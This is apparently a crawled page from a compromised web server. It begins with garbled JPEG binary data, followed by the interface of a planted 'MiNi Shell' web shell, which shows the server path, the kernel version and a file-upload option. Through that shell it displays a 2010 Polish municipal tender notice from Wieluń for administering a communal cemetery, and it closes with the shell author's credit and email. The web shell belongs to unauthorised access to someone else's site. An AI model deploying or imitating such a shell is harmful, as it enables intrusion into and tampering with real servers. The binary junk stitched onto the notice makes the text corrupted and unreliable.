JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100204/24909-N-2010.html

<p class="kh_header"><b>Wieluń: Administrowanie cmentarzem komunalnym w Wieluniu przy ulicy Roosevelta</b><br>
<b>Numer ogłoszenia: 24909 - 2010; data zamieszczenia: 04.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Wieluniu , Plac Kazimierza Wielkiego 1, 98-300 Wieluń, woj. łódzkie, tel. 043 8860249, faks 043 8860260.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.wielun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Administrowanie cmentarzem komunalnym w Wieluniu przy ulicy Roosevelta.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest administrowanie cmentarzem komunalnym w Wieluniu - przy ulicy Roosevelta w zakresie: utrzymania czystości i porządku, utrzymania zieleni, utrzymania obiektów budowlanych i uzbrojenia oraz prowadzenie działalności cmentarnej, tj.:
1.Działalność cmentarna:
a) wykonywanie czynności ciążących na zarządcy cmentarza określonych w przepisach i w regulaminie cmentarza, w szczególności w zakresie:
- wykonywanie pochówków osób w stosunku, do których żadna z firm nie wyraziła woli dokonania pochówku,
- prowadzenie całości wymaganej przepisami ustaw, uchwały Nr XXXVIII/406/09 Rady Miejskiej w Wieluniu w sprawie ustalenia zasad korzystania z Cmantarza Komunalnego w Wieluniu i zarządzeń Burmistrza Wielunia dokumentacji ksiąg cmentarnych, rejestrów przyjęcia zwłok, wykonywania robót na cmentarzu, dokumentacji finansowej,
- załatwianie spraw formalno - organizacyjnych dotyczących funkcjonowania cmentarza i udzielenia informacji osobom zainteresowanym,
- racjonalnego wykorzystania miejsc pochówków, w tym wytyczanie kolejnych kwater, rezerwowanie i udostępnianie miejsc pod groby (zgodnie z zarządzeniem o wysokości opłat za korzystanie z cmentarza komunalnego), wytyczanie miejsc pod groby, nadzorowanie wykonywania i utrwalania grobów zgodnie z obowiązującym prawem i ich odbiór,
- nadzorowanie prac firm usługowych ( zakłady pogrzebowe, kamieniarskie itp.) w szczególności w zakresie przestrzegania parametrów przewidzianych w przepisach szczegółowych dotyczących wymiarów grobów, nagrobków, pomników oraz odstępów pomiędzy tymi miejscami oraz w zakresie gospodarowania odpadami pochodzącymi z rozbiórki bądź stawiania nowych pomników ( ziemia, gruz usuwane będą z terenu cmentarza przez firmy usługowe),
b) egzekwowanie przestrzegania zasad wynikających z regulaminu korzystania z cmentarza komunalnego w Wieluniu przy ulicy Roosevelta, który w formie czytelnej tablicy powinien być umieszczony w dostępnych i widocznych miejscach,
c) sprawowanie nadzoru nad prawidłowością wpłat z tytułu opłat za usługi cmentarne określone w aktualnie obowiązującym zarządzeniu o wysokości cen i opłat za korzystanie z cmentarza komunalnego, 
d) prowadzenie statystyki, prognozowanie oraz składanie kwartalnych i rocznych oraz na żądanie Zamawiającego, sprawozdań z działalności, a w szczególności
- wykorzystania miejsc na cmentarzu
2.Utrzymanie w czystości i porządku terenu cmentarza:
a) drogi, aleje i ścieżki przy ulicy Roosevelta: zamiatanie, wyrównywanie nawierzchni dla ułatwienia spływu wód opadowych, likwidowanie zastoisk wody, gołoledzi, śniegu, usuwanie zarastania brzegów nawierzchni w przypadku braku obrzeży trawników, krawężników, a także utrzymanie w porządku i czystości opuszczonych grobów,
b) regularne opróżnianie koszy służących do zbierania odpadów komunalnych, utrzymanie ich w odpowiednim stanie sanitarnym, technicznym i porządkowym oraz zbieranie i wywożenie nieczystości, 
c) sprawowanie dozoru w godzinach otwarcia cmentarza.
3.Utrzymanie zieleni, w szczególności:
a) utrzymanie we właściwym stanie trawników: koszenie, pielenie, nawożenie, dosiewanie trawy, usuwanie uszkodzeń, podlewanie,
b) niszczenie chwastów w pasie przyległym, tj. pomiędzy cmentarzem, a aleją główną oraz pomiędzy aleją główną, a ogrodzeniem istniejącego już cmentarza.
4.Utrzymanie obiektów budowlanych i uzbrojenia, w szczególności:
a) utrzymanie w dobrym stanie technicznym placów, dróg komunikacyjnych, ogrodzenia, punktów czerpania wody itp., w szczególności poprzez:
- ponoszenie drobnych nakładów związanych ze zwykłym używaniem obiektu ( np. malowanie siatki),
- wykonywanie bieżących napraw i konserwacji obiektów i urządzeń cmentarza, w szczególności ogrodzenia,
b) korzystanie z obiektów zgodnie z ich przeznaczeniem,
c) ponoszenie kosztów wywozu odpadów i innych opłat związanych z funkcjonowaniem cmentarza,
d) zapewnienie możliwości korzystania z punktów czerpalnych wody.
5. Dane dotyczące cmentarza komunalnego przy ulicy Roosevelta w Wieluniu
- powierzchnia pól grzebalnych 1301,98 m2
- powierzchnia ciągów pieszych 337,03 m2
- powierzchnia ciągów pieszo -jezdnych 1040,12 m2
6. Inne wytyczne dotyczące przedmiotu zamówienia:
a) dochody uzyskane z opłat za usługi cmentarne określone w obowiązującym Zarządzeniu Burmistrza Wielunia w sprawie ustalenia wysokości opłat za korzystanie z Cmentarza Komunalnego muszą być wpłacone na konto Zamawiającego lub do kasy Urzędu Miejskiego w Wieluniu.
b) Wykonawca ma obowiązek sprawowania nadzoru nad prawidłowością wpłat z tytułu opłat za usługi cmentarne ,
c) Wykonawca nie może stosować innych opłat za usługi cmentarne, niż opłaty określone w obowiązującym Zarządzeniu Burmistrza Wielunia,
d) Wykonawca zapewnia wszelkie materiały i akcesoria niezbędne do prowadzenia dokumentacji cmentarza,
e) Wykonawca pokrywa koszty wywozu nieczystości oraz innych obowiązkowych opłat związanych z funkcjonowaniem cmentarza,
f) Po zakończeniu umowy Wykonawca zobowiązany jest przekazać protokolarnie Zamawiającemu całą prowadzoną dokumentację oraz przedmiot administrowania w stanie nie pogorszonym ponad zużycie wynikające z normalnej eksploatacji zgodnie z przeznaczeniem.
g) Wykonawca ponosi pełną odpowiedzialność za wszystkie zdarzenia związane z administrowaniem, w wyniku których nastąpiła szkoda na mieniu, zdrowiu lub życiu osób trzecich przebywających na cmentarzu.
h) W ramach wykonania zamówienia Wykonawca ma obowiązek znać obowiązujące przepisy prawa w zakresie: - urządzania cmentarzy, prowadzenia ksiąg cmentarnych i chowania zmarłych. -prowadzenia ewidencji grobów. -postępowania ze zwłokami i szczątkami ludzkimi.
7. Opis wymaganego wyglądu cmentarza:
1.Teren czysto utrzymany z należytą starannością.
2. Kontenery i kosze opróżniane na bieżąco z nieczystości
3. Zimą alejki, place oraz dojścia do cmentarza odśnieżone i posypane piaskiem, przez pozostałą część roku zamiatane, po zimie oczyszczone z piasku i błota, alejki odchwaszczone 
4.Trawniki :
a ) wiosną wygrabione
b ) latem wykoszone- wysokość trawy do 15 cm
c ) jesienią trawy wykoszone, liście wygrabione i wywiezione,
d ) instalacja wodna za zimę zabezpieczona przed zmarznięciem,
e ) krzewy na terenie cmentarza oraz okalające, przycinane i usuwane z terenu cmentarza.
8. Wykonawca zobowiąże się w ramach przedmiotu zamówienia udostępnianiać toalety dla odwiedzających cmentarz komunalny w Wieluniu oraz do utrzymania porządku i czystości toalet wraz z wywozem nieczystości.
9. Zamawiający wymaga aby miejsce realizacji wszelkich spraw związanych z działalnością administratora mieściło się na terenie miasta Wielunia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 Ustawy stanowiących nie więcej niż 50 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 98.37.11.11-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający zaleca załączenie do oferty dowodu wniesienia wadium - wadium należy wnieść przelewem na wskazany rachunek (dotyczy wadium w formie pieniądza) lub w kasie Urzędu Miejskiego w Wieluniu (dotyczy wadium w innej formie niż pieniądz) do chwili złożenia ofert tj. do dnia 15.02.2010 r. do godz. 12.00 w wys. 5 000,00 zł W przypadku nie wniesienia wadium jak wyżej zamawiający uzna, iż oferta nie została zabezpieczona wadium, a wykonawca będzie podlegał wykluczeniu na podstawie art. 24 ust. 2. pkt. 4 ustawy Prawo zamówień publicznych</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie przez Wykonawcę w ofercie dokumentów i oświadczeń wymienionych w pkt 13.2 SIWZ. będzie stanowiło podstawę do oceny spełnienia warunków udziału w postępowaniu. Zamawiający sprawdzi z treści tych dokumentów i oświadczeń czy Wykonawca spełnia wszystkie warunki.
Zamawiający żąda, żeby Wykonawca wykazał, nie później niż na dzień składania ofert, spełnianie warunków, o których mowa w pkt 12 SIWZ.
Oferta, wykaz oświadczeń lub dokumentów, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu i niepodleganiu wykluczeniu z postępowania oraz dokumenty lub inne elementy potwierdzające, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego:
Jeżeli wykonawca wykazując spełnianie warunków, o których mowa w art.22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust.2b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, zamawiający żąda od wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w pkt 13.2 SIWZ
Zamawiający oceni spełnianie warunków udziału w postępowaniu w zależności od złożonych dokumentów na  zasadzie spełnia -nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien złozyć oświadczenie o spełnieniu tego warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien złozyć oświadczenie o spełnieniu tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przetargu mogą wziąć udział Wykonawcy, którzy spełniają szczegółowy warunek :
a.dysponują minimum jedną osobą posiadającą licencję zawodową zarządcy nieruchomości nadaną w trybie art.192 ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami tekst jednolity Dz.U. z 2004 r. nr 261 poz. 2603 z późn. zm. posiadającą ubezpieczenie od odpowiedzialności cywilnej za szkody, które mogą powstać w związku z wykonywaniem czynności zarządzania</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien złozyć oświadczenie o spełnieniu tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust.1 ustawy Pzp przewiduje się możliwość dokonania niżej wymienionych zmian umowy :
Wynagrodzenie, o którym mowa w § 7 ust. 1 może ulec zmianie w przypadku ustawowej zmiany podatku VAT na usługi objęte niniejszą umową.
Wynagrodzenie może ulec zmniejszeniu w przypadku odstąpienia przez Zamawiającego od realizacji części umowy
Wykonawca może dokonywać zmiany osoby posiadającej licencję z zakresu zarządzania nieruchomościami, o którym mowa w § 3 umowy, przedstawionego w ofercie, jedynie za uprzednią pisemną zgodą zamawiającego, akceptującego nową osobę posiadającą licencję z zakresu zarządzania nieruchomościami posiadającą ubezpieczenie odpowiedzialności cywilnej za szkody, które mogą powstać w związku z wykonywaniem czynności zarządzania
Wykonawca z własnej inicjatywy proponuje zmianę osoby posiadającej licencję z zakresu zarządzania nieruchomościami w następujących przypadkach:
- śmierci, choroby lub innych zdarzeń losowych 
- niewywiązywania się z obowiązków wynikających z umowy
- jeżeli zmiana stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od wykonawcy (np. rezygnacji)
Zamawiający może zażądać od Wykonawcy zmiany osoby posiadającej licencję z zakresu zarządzania nieruchomościami, jeżeli uzna, że nie wykonuje on swoich obowiązków wynikających z umowy.
W przypadku zmiany osoby posiadającej licencję z zakresu zarządzania nieruchomościami, nowa osoba posiadająca licencję z zakresu zarządzania nieruchomościami musi spełniać wymagania. 
Wykonawca obowiązany jest zmienić osobę posiadającą licencję z zakresu zarządzania nieruchomościami zgodnie z żądaniem Zamawiającego w terminie wskazanym we wniosku Zamawiającego.
Nie jest dopuszczalna zmiana Wykonawcy za wyjątkiem sukcesji generalnej, przekształcenia, dziedziczenia spółek handlowych z KSH, sukcesji z mocy prawa.
Zmiana postanowień umowy może nastąpić za zgodą obu stron wyrażoną na piśmie, w formie aneksu do umowy, pod rygorem nieważności takiej zmiany. Zmiany nie mogą naruszać postanowień zawartych w art. 144 ust. 1 Prawa zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.um.wielun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Wieluniu Pl. Kazimierza Wielkiego 1, w Biuro Zamówień Publicznych pokój nr 204..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.02.2010 godzina 11:00, miejsce: Urząd Miejski w Wieluniu Pl. Kazimierza Wielkiego 1, w Biuro Obsługi Interesanta pok. Nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com